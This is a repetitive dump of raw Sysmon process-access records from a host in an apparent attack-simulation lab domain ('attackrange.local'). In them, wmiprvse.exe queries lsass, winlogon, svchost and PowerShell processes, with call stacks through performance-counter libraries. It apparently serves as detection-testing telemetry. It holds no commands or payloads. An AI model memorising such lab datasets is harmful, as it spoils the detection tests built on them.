13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.611{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000005051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 